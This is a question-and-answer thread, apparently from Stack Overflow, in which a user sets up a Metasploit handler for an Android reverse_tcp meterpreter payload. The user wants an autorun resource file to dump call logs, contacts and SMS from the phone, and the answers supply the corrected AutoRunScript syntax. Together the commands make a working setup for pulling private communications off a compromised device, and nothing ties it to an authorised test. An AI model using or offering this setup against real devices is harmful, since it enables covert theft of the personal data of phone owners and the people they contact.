# I want to dump call log cantacts sms with autorunscript using metasploit. but I failed to do it

Tags: php, ruby, python-3.x, metasploit

I can not run the autorun script in my terminal. I want to dump call, message, and contact from android.

```
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST ip
set LPORT 444
set AutoRunScript multi_console_command -rc cmd.rc
exploit -j -z
```

in cmd.rc file I wrote these line

```
dump_calllog
dump_cantacts
dump_sms
```

but its not works.

Answer (score 0):

Change `-rc` to `-r`

```
set AutoRunScript multi_console_command  -r cmd.rc
```

Should do the trick. This has been documented in an [issue ticket](https://github.com/rapid7/metasploit-framework/issues/10408) on the official github project of metasploit.

Comment: Can you provide more details, why not to include -c

Answer (score 0):

As mentioned by [Papia roy chowdhury](https://stackoverflow.com/questions/58146995/i-want-to-dump-call-log-cantacts-sms-with-autorunscript-using-metasploit-but-i/60398946#60398946), the syntax of the `multi_console_command` command changed, as per [this pull request in the official Github repository](https://github.com/rapid7/metasploit-framework/issues/10408).

The syntax now is as follows:

```
set AutoRunScript multi_console_command  -r cmd.rc
```